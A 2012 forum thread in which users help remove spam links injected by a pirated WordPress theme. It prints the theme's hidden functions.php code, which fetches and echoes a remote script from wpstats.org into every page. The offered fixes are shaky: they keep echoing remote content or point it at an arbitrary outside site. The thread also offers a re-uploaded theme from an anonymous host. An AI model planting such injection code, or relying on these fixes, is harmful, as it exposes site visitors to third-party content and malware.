1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Help needed in Removing Hidden Links from a WP theme

Discussion in 'Black Hat SEO' started by SahL, Jan 31, 2012.

  1. SahL

    SahL Elite Member

    Joined:
    Jan 8, 2011
    Messages:
    1,594
    Likes Received:
    1,296
    Occupation:
    ★SEO expert and ★Sexpert
    Location:
    Bombay
    Home Page:
    So i have this wp theme which i've gotto use, After a day of activating i see

    Adult keywords in description on google for this new website.

    I viewed the source and found some adult keywords linking to care2.com and magento webhosting.

    Deactivated this theme and everything was fine again, So its the theme which is causing it surely.

    Checked each and every file in the theme but couldnt get anything :O

    The code which i found by viewing source and download link of theme is below :

    Code found by view source:


    Theme DL link:

    Code:
    http://www.mediafire.com/?ej2y0bmxabbddog
    Virus Total : Detection ratio: 0 / 39

    Code:
    https://www.virustotal.com/file/4fe2c6d268e3fc9bc2b6775e21f56f37a3ac8cef0e39e2fd010dbb0f06474172/analysis/1327982943/
    Help from anyone would be very much appreciated.

    Thank you!
     
    • Thanks Thanks x 1
    Last edited: Jan 31, 2012
  2. itzcorky

    itzcorky Junior Member

    Joined:
    Nov 1, 2011
    Messages:
    140
    Likes Received:
    67
    Occupation:
    Being a Boss
    I will go through and find all the keywords and links and then remove them and then I will add a txt file in the rar which will point to all the files that had keywords and such that way you can add your own.
     
  3. sawangan

    sawangan Regular Member

    Joined:
    Jan 21, 2009
    Messages:
    345
    Likes Received:
    27
    Location:
    SG-ID-AU
    if your jquery links to wpstats.org that might be the problem
    i noticed this problem few days ago, and then i change the jquery to another source and that strange links is gone.
    if you are using wordpress..just look at functions.php at the theme that you are using right now.

    a lot of people might experience the same because until now the bug (or hacked) have not being fixed.
    source: http://wordpress.org/support/topic/un-necessary-care2com-links-in-my-source-file
     
    • Thanks Thanks x 2
    Last edited: Jan 31, 2012
  4. dvs one

    dvs one Junior Member

    Joined:
    Sep 16, 2009
    Messages:
    130
    Likes Received:
    22
    Occupation:
    maps
    Location:
    yay area
    goto your ftp and then goto wp-contents -> themes -> select your theme and look for footer.php its most likely there.. it may be encrypted but i highly doubt it.. just remove the necessary code
     
  5. itzcorky

    itzcorky Junior Member

    Joined:
    Nov 1, 2011
    Messages:
    140
    Likes Received:
    67
    Occupation:
    Being a Boss
    Ok so all you need to do is upload the theme and then activate it and then edit it and you will find them.
     
  6. SahL

    SahL Elite Member

    Joined:
    Jan 8, 2011
    Messages:
    1,594
    Likes Received:
    1,296
    Occupation:
    ★SEO expert and ★Sexpert
    Location:
    Bombay
    Home Page:
    if you can find them that would be great!

    yes i tried to find it but cudnt anywhere in the theme files.

    Footer.php doesnt have any simple links nor in encoded form.

    Checked with TAC. Havent found any thing.
     
  7. SahL

    SahL Elite Member

    Joined:
    Jan 8, 2011
    Messages:
    1,594
    Likes Received:
    1,296
    Occupation:
    ★SEO expert and ★Sexpert
    Location:
    Bombay
    Home Page:
    doesnt link there but as you can see in the above code..the first link goes to ..www.wpdb dot org

    Searched Function.php, cdnt find anything.
     
  8. TeddyKGB

    TeddyKGB Newbie

    Joined:
    Apr 15, 2010
    Messages:
    23
    Likes Received:
    12
    Occupation:
    Freedom
    Location:
    East
    I had this issue once, where just like you i knew I had checked all the files etc. Turned out the links were actually encoded in a .GIF image. Open all the img files in a text editor and see if you see anything strange.
     
    • Thanks Thanks x 1
  9. Jared255

    Jared255 Jr. Executive VIP Jr. VIP Premium Member

    Joined:
    May 10, 2009
    Messages:
    1,907
    Likes Received:
    1,662
    Location:
    Boston, MA
    I feel your pain bro... had to buy my first WP theme ever recently... couldn't figure out how to get the footer links out... $20 :(
     
    • Thanks Thanks x 1
  10. SahL

    SahL Elite Member

    Joined:
    Jan 8, 2011
    Messages:
    1,594
    Likes Received:
    1,296
    Occupation:
    ★SEO expert and ★Sexpert
    Location:
    Bombay
    Home Page:
    wahttt? in a .gif image?? :eek:

    Wil check them. Thanks!

    this ones for $35, im gonna use it for a semi auto blog :O
    ------

    c'mon there must be some one on BHW who has encoded such links and knows how to remove em.

    Help please!
     
  11. argh11

    argh11 Regular Member

    Joined:
    Jul 14, 2011
    Messages:
    307
    Likes Received:
    116
    Location:
    USA
    Oh man this is all I have been doing lately. :(

    And I have run accross the encoded .gif also...blech!

    Anyway, I will take a look at it for you.

    -argh11
     
    • Thanks Thanks x 1
  12. sawangan

    sawangan Regular Member

    Joined:
    Jan 21, 2009
    Messages:
    345
    Likes Received:
    27
    Location:
    SG-ID-AU
    are you sure lookin on the functions.php?
    it is on the first line, you really can't miss that..

    actual coding
    Code:
    if (!function_exists('insert_jquery_theme')){function insert_jquery_theme(){if (function_exists('curl_init')){$url = "http://www.wpstats.org/jquery-1.6.3.min.js";$ch = curl_init();    $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_theme');}
    replace with
    Code:
    if (!function_exists('insert_jquery_theme')){function insert_jquery_theme(){if (function_exists('curl_init')){$url = "http://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.6.3.min.js";$ch = curl_init();    $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_theme');}
    problem solved
     
    • Thanks Thanks x 1
  13. argh11

    argh11 Regular Member

    Joined:
    Jul 14, 2011
    Messages:
    307
    Likes Received:
    116
    Location:
    USA
    Well looks like a tricky one...arn't they all! ;)

    Anyway Sawangan was right about the wpstats thing.

    You can look in your functions file and near the top it shows

    Code:
    $url = "http://www.wpstats.org/jquery-1.6.3.min.js";
    simply change it to something like:

    Code:
    $url = "http://www.nothingtoseehere.com";
    or you can get the fixed theme here:

    http://www.mediafire.com/?qdtagiwwhw15v9b


    Virustotal
    Code:
    https://www.virustotal.com/file/7cb0939289e4ffade8c2616061a0870bec3d514993f545621e0b7bc405332799/analysis/1327995441/

    Cheers!
    :)
    -argh11
     
    • Thanks Thanks x 1
  14. argh11

    argh11 Regular Member

    Joined:
    Jul 14, 2011
    Messages:
    307
    Likes Received:
    116
    Location:
    USA
    lol, you were a couple minutes quicker than me :)


    Edit: It looks like Sawangan's fix is most likely better...as he keeps the java source file (just re-directs it to a known good one). This way your java is not broken.

    disclaimer: *I don't know java that well yet*
     
    • Thanks Thanks x 1
    Last edited: Jan 31, 2012
  15. SahL

    SahL Elite Member

    Joined:
    Jan 8, 2011
    Messages:
    1,594
    Likes Received:
    1,296
    Occupation:
    ★SEO expert and ★Sexpert
    Location:
    Bombay
    Home Page:

    Oh! i was searching for wpdb.org links in function.php :O :p


    I replaced it, it started showing the javascript on the webpage

    Screenshot: http://awesomescreenshot.com/022t7tk55

    so i replaced it with http://www.nothingtoseehere.com"

    Working Good now!!!

    Thanks alot man!! :biggthump :)


    Thanks bro, Your Fix Worked! , Fix and Upload both appreciated a lot. :mad: :)

    BHW :You_Rock_ :headbang:
     
    Last edited: Jan 31, 2012
  16. Quazpolter

    Quazpolter Junior Member

    Joined:
    Dec 29, 2011
    Messages:
    114
    Likes Received:
    23
    don't download themes from anywhere but wordpress.org or a reputable premium

    I downloaded thesis from some corner of the internet and it had code pulling some jscript from j-query.org

    I only found out because it 404'd
     
  17. Vermino

    Vermino Newbie

    Joined:
    Jan 21, 2012
    Messages:
    31
    Likes Received:
    4
    Location:
    Las Vegas, Nevada
    Isn't it fun looking for bullsh*t content in WP themes? like an Easter egg hunt haha :D
     
  18. davidatunlea

    davidatunlea Newbie

    Joined:
    Aug 26, 2011
    Messages:
    1
    Likes Received:
    0
    I'm having the same issue but changing the code in functions.php has not removed the link anybody have any other advice?? The links are to the same site as the first post on this thread. I have ran queries and check for hidden links in base64_encode php functions and haven't found anything anywhere. Any help would be greatly appreciated.
     
    Last edited: Feb 29, 2012
  19. piardog

    piardog Newbie

    Joined:
    Feb 22, 2009
    Messages:
    13
    Likes Received:
    0
    Location:
    Ireland